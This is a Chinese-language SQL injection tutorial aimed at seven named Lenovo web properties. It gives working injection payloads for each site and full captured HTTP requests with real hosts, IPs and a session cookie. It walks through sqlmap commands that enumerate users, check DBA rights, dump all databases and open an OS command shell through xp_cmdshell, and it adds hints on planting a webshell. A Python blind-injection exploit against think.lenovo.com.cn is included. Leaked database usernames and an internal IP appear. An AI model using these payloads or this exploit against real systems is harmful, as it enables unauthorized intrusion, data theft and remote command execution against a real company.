普通SQL注入

安全防御：过滤/转义非法参数，屏蔽SQL查询错误。

工具：Firefox，hackbar，sqlmap，burpsuite

1、联想tms站

例1， 联想tms站fromCity参数存在普通SQL注入

提交，fromCity=6F9619FF-8A86-D011-B42D-00004FC964FF’ UNION SELECT user—

结果，数据库用户名信息泄露:swwl，而且，web物理路径也泄露，如图：

使用burpsuite获取正常请求包

POST /Common/AjaxWebService.asmx/CheckIsExistDefault HTTP/1.1

Host: tms.lenovomobile.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 94

fromCity=6F9619FF-8A86-D011-B42D-00004FC964FF&toCity=&CATID=&check=

将该数据包保存到：c:\test5.txt

此时，使用sqlmap验证该SQL注入

sqlmap.py -r c:\test5.txt -p fromCity //查询数据库、系统、中间件，脚本等信息

可以看到：

web server operating system: Windows 2008 R2 or 7 //系统：Windows 2008R2(一般)
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727 //脚本：aspx，ashx
back-end DBMS: Microsoft SQL Server 2008 //数据库：mssql

sqlmap.py -r c:\test5.txt --current-user //查询发生SQL注入的数据库的当前用户

看到了吗，当前用户就是：swwl

判断该当前用户是否是dba权限

sqlmap.py -r c:\test5.txt --is-dba

current user is DBA:    False //说明不是dba权限

查看一下该数据库全部用户

sqlmap.py -r c:\test5.txt --privileges

看到了吗，该数据库共有两个用户：sa与swwl，而且，sa才具有dba权限。

此情此景，怎么获取dba权限，大家可以研究一下。

接下来，当然就是获取敏感数据了

sqlmap.py -r c:\test5.txt –dbs //查询出所有数据库

看到了吗，共8个有效数据库被查询出来了。

接下来，就是--dump-all了。

2、联想club站

例1，联想club站uid参数存在普通SQL注入

提交，uid=3042366 or 1=1

结果，敏感信息泄露，如图：

提交，uid=3042366 or left(database(),7)=’club_v2’

结果，敏感信息泄露，如图：

3、联想ask站

例1，联想ask站uid参数存在普通SQL注入

提交，uid=(select exp(~(select * from (select user())a)))

结果， 数据库用户及权限信息泄露，如图：

root@ask.lenovo.com.cn  from  dual

4、联想b2b站

例1， 联想b2b站id参数存在普通SQL注入

提交，id=1) UNION ALL SELECT CONCAT(user()),NULL,NULL,NULL,NULL,NULL—

结果，数据库用户信息泄露，如图：

think_b2b@202.85.219.248，不知道这个用户有没有dba权限

接下来的渗透，就跟tms站的思路一致了。

5、联想rel站

例1， 联想rel站TypeID参数存在普通SQL注入

提交，TypeID=8 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#

结果，数据库用户名泄露，而且，内网IP也泄露，如图：

hzrelmysql@10.132.32.162，不知道这个用户有没有dba权限

提交，TypeID=8 and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)#

结果，数据库版本泄露，如图：

5.5.18.1-log

接下来的渗透，就跟tms站的思路一致了。

6、联想itsm站

例1， 联想itsm站ctl00$ContentSearch$TxtNextEmpName参数存在普通SQL注入

post提交：

POST /8.App/AppBillQry.aspx?Trn=A&DgIndex=2 HTTP/1.1

Host: 119.233.254.28

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://119.233.254.28/8.App/AppBillQry.aspx?Trn=A&DgIndex=2

Cookie: ASP.NET_SessionId=cjvsnmmmsmovnhpzy1132ddc

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 4816

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAwNzk4NzMyMw9kFgJmD2QWAgIDD2QWCgIBD2QWCgIBDw8WAh4EVGV4dAUn6IGU5oOz5omL5py65Lia5YqhLee7iOerr0hS566h55CG57O757ufZGQCAw8PFgIfAAUJ6JGj5b%2BX5YuHZGQCCQ8WAh4JaW5uZXJodG1sBQzljZXmja7lrqHmiblkAhEPZBYCAgEPFgIeBXN0eWxlBR9Db2xvcjpEYXJrUmVkO0ZvbnQtd2VpZ2h0OmJvbGQ7ZAITDxYCHgdWaXNpYmxlaGQCAw88KwALAQAPFhAeEXN0ck1vdXNlT3ZlckNvbG9yBQtMaWdodFllbGxvdx4LXyFJdGVtQ291bnQCBx4IRGF0YUtleXMWAB4JUGFnZUNvdW50AgEeDUVkaXRJdGVtSW5kZXgC%2F%2F%2F%2F%2Fw8eFV8hRGF0YVNvdXJjZUl0ZW1Db3VudAIHHglpUm93Q291bnQCBx4XQXV0b1VwZGF0ZUFmdGVyQ2FsbEJhY2tnZBYCZg9kFg4CAQ8PFgYeCUZvcmVDb2xvcgqkAR4JQmFja0NvbG9yCpwBHgRfIVNCAgwWBh4Lb25tb3VzZW92ZXIFUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHgpvbm1vdXNlb3V0BSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IfAgUsYmFja2dyb3VuZC1pbWFnZTp1cmwoLi4vaW1hZ2VzL21lbnVfYmcuZ2lmKTsWBGYPZBYCAgEPDxYCHwAFATFkZAICD2QWAgIBDw8WCB4LTmF2aWdhdGVVcmxlHwAFEOKWoCDljZXmja7nlLPor7ceCUZvbnRfQm9sZGcfDgKAEGRkAgIPD2QWBB8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IWBGYPZBYCAgEPDxYCHwAFATJkZAICD2QWAgIBDw8WBB8RBSUuLi84LkFwcC9BcHBOZXdSZXFMaXN0LmFzcHg%2FRGdJbmRleD0xHwAFCeaWsOeUs%2Bivt2RkAgMPD2QWBB8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IWBGYPZBYCAgEPDxYCHwAFATNkZAICD2QWAgIBDw8WCh8RBSguLi84LkFwcC9BcHBCaWxsUXJ5LmFzcHg%2FVHJuPUEmRGdJbmRleD0yHwAFFeW3sueUs%2Bivt%2BWNleaNruafpeivoh8SZx8MCjsfDgKEEGRkAgQPDxYGHwwKpAEfDQqcAR8OAgwWBh8PBVBjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9J0xpZ2h0WWVsbG93Jx8QBSd0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IfAgUsYmFja2dyb3VuZC1pbWFnZTp1cmwoLi4vaW1hZ2VzL21lbnVfYmcuZ2lmKTsWBGYPZBYCAgEPDxYCHwAFATRkZAICD2QWAgIBDw8WCB8RZR8ABRHilqAg5a6h5om5Juafpeivoh8SZx8OAoAQZGQCBQ8PZBYEHw8FUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHxAFJ3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvchYEZg9kFgICAQ8PFgIfAAUBNWRkAgIPZBYCAgEPDxYEHxEFKC4uLzguQXBwL0FwcEJpbGxRcnkuYXNweD9Ucm49UCZEZ0luZGV4PTQfAAUN5a6h5om5JuafpeivomRkAgYPDxYCHwNoFgQfDwVQY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPSdMaWdodFllbGxvdycfEAUndGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9Y3VycmVudGNvbG9yFgRmD2QWAgIBDw8WAh8ABQE2ZGQCAg9kFgICAQ8PFgQfEQUoLi4vOC5BcHAvQXBwQmlsbFFyeS5hc3B4P1Rybj1RJkRnSW5kZXg9NR8ABQ%2FlrqHmibnljZXmn6Xor6JkZAIHDw8WAh8DaBYEHw8FUGN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nTGlnaHRZZWxsb3cnHxAFJ3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvchYEZg9kFgICAQ8PFgIfAAUBN2RkAgIPZBYCAgEPDxYEHxEFKC4uLzguQXBwL0FwcEJpbGxRcnkuYXNweD9Ucm49TSZEZ0luZGV4PTYfAAUP5a6h5om55Y2V566h55CGZGQCBw8PFgIfAAUV5bey55Sz6K%2B35Y2V5o2u5p%2Bl6K%2BiZGQCCQ9kFgQCAQ8QDxYIHg1EYXRhVGV4dEZpZWxkBQtCYXNCaWxsTmFtZR4ORGF0YVZhbHVlRmllbGQFCUJhc0JpbGxJRB4LXyFEYXRhQm91bmRnHwtnZBAVAwAP6YCa55So5a6h5om55Y2VGOWRmOW3peWfuuiWquiwg%2BaVtOeUs%2BivtxUDAAEyATQUKwMDZ2dnFgFmZAIDDxAPFggfEwUIRGlzcE5hbWUfFAUIU3ViQ2xhc3MfFWcfC2dkEBUHAAbojYnnqL8J5b6F5a6h5om5D%2BWuoeaJueacqumAmui%2FhwzlrqHmibnlrozmiJAP566h55CG5ZGY5pKk5ZueDOeUqOaIt%2BaSpOWbnhUHAAEwATEBOAE5AUUBVxQrAwdnZ2dnZ2dnFgFmZAILD2QWAgIBDzwrAAsBAA8WEB8FZh8GFgAfBwIBHwgC%2F%2F%2F%2F%2Fw8fCWYfCmYfC2ceEEN1cnJlbnRQYWdlSW5kZXhmZBYCZg9kFgICAw9kFgJmD2QWAgIEDw8WCB8AZR4FV2lkdGgbAAAAAAAAPkABAAAAHgZIZWlnaHQbAAAAAAAAMkABAAAAHw4CgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUhY3RsMDAkQ29udGVudFNlYXJjaCRDYldpdGhBc2tEYXRlvLFsQJgxlR%2FCMbKdAdVa5UFo74arMZT%2Fw7ymYDkvWh0%3D&__EVENTVALIDATION=%2FwEdABxcvDxkgpH7c9m2bjtilBinVTQc%2B1IQ0yAquaCqQNGNf15wl3706%2FHYHJFSFSU%2FlRBlQWBnca%2Fe44mX9dJ2F27qwgIzZ3cYKKNp1lGZZqeaR0HvlDL6TJ3%2B5ekIGnuHyHY9CL68CCRonzsgCMj5fSfZWq0xbqjvVo9pONPnvJUwbH7n5ltL0IZdjVaeg3ux9tsaMmqAPvO1UpM2j82TI3sQN00qPdTFkhjProA1YcFQYqgz9YAqvLO60JA6OJZg%2B6xxzMEJSwj3k%2FHIfcegpfnsjpOtNFbkERvSEeHAhYABTHwViAIUPweGnoE%2F6qrZRTnVAtg0mUueFTWfTlyNfDYxIBcY4fyO38eURsUSbdbBJafVFWPduvw10pHT5wVk%2Bxu1drRTLbaLo2HJ08eNUqRoQni7uX8%2FGYl%2BaKHQzdZ8eJ8WcYn6ZAM9vRDOigbS92cd2Fu2aiv5mQAFdcyxJM2PMXBN8tqEt%2Fgy9UxwH9DVsj16j4C8slXvkdHWoIEXCIdZtQ2vq3Y1eiDfdIP41qlwjJUOhTAuWow6l9Dl4BYPP0KSAOyoj3kiyradPE7arZoYq0ugKENf63EQvBK8lYL0mny1TpBxZCsQLOVGjsL9nI3m3xfzRX8fk2vnmlpMglY%3D&ctl00%24ContentSearch%24DdlBasBillName=&ctl00%24ContentSearch%24DdlAppStatus=&ctl00%24ContentSearch%24CbWithAskDate=on&ctl00%24ContentSearch%24TxtDateFr=2015-12-11&ctl00%24ContentSearch%24TxtDateTo=2016-01-11&ctl00%24ContentSearch%24TxtRegName=111111111&ctl00%24ContentSearch%24TxtNextEmpName=&ctl00%24ContentSearch%24btnSearch=%B2%E9%D1%AF&ctl00%24ContentDetail%24GvDetail%24ctl04%24ctl03=

将该请求包保存到c:\test1.txt

直接上sqlmap，验证该SQL注入

sqlmap.py -r c:\test1.txt

看到了吧：

web server operating system: Windows 2008 R2 or 7 //Windows 2008R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 //aspx，ashx脚本
back-end DBMS: Microsoft SQL Server 2008 //mssql数据库

接下来，查看当前用户是否具有dba权限

sqlmap.py -r c:\test1.txt --is-dba

current user is DBA:    True //说明当前用户具有dba权限，好

dba权限：数据库管理员权限，如果存在xp_cmdshell的话，该权限可以执行系统命令

此时，我们就可以通过os-shell来执行系统命令了

提交：

sqlmap.py -r c:\test1.txt --os-shell //获取系统cmdshell

sqlmap回显如下：

[10:16:54] [INFO] testing if current user is DBA

[10:16:55] [INFO] testing if xp_cmdshell extended procedure is usable

[10:17:27] [INFO] going to use xp_cmdshell extended procedure for operating system command execution

[10:17:27] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER

到此，我们就获取到了系统cmdshell了

在os-shell>这个界面，你就可以执行cmd命令了

Ver

Dir

Net user

Netstat –ano

…

在os-shell>这个界面，你也可以通过某些方法来获取该站点的webshell，大家可以研究下

网上流传的sqlmap交互式写webshell，对于MySQL数据库+php还实用，经本人亲测，mssql数据库+aspx不适用，对于mssql数据库+aspx，建议使用os-shell>来写webshell，至于写webshell的方法，大家可以自行百度。

退出该cmdshell，直接x

do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n]

Y

7、联想think站

例1， 联想think站doccatid参数存在普通SQL注入

提交，doccatid=(case when 1 like 1 then 1249014520765 end)

结果，将全部文章都查询出来了，如图：

可见，这里存在搜索型SQL注入

此时，使用Python编写一个EXP

import httplib

import time

import string

import sys

import random

import urllib

headers = {

'Content-Type': 'application/x-www-form-urlencoded',

'Cookie': '',

'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36',

}

payloads = list(string.ascii_lowercase)

payloads += list(string.ascii_uppercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.', '-', '\\', ' ']

print 'Try to retrive SQL User'

user = ''

for i in range(1,13):

for payload in payloads:

lens = 0

for j in range(1,3):

try:

conn = httplib.HTTPConnection('think.lenovo.com.cn', timeout=5)

start_time = time.time()

conn.request('GET',"/htmls/advancedsearch.aspx?doccatid=(case%20when%20user%20like%20CAST%280x"+user+"%s25" % payload.encode('hex')+"%20AS%20VARCHAR%284000%29%29then%201249014520765%20end)")

lens=conn.getresponse().length

conn.close()

break

except:

print 'no'

if lens >= 24000 and lens <= 25000:    # 2 succ

user += payload.encode('hex')

sys.stdout.write( '\r[In Progress] ' + user.decode('hex') )

sys.stdout.flush()

break

print '\n[Done], SQL user is', user.decode('hex')

通过该exp，就可以查询出当前数据库的用户了

数据库用户：web_thinkcms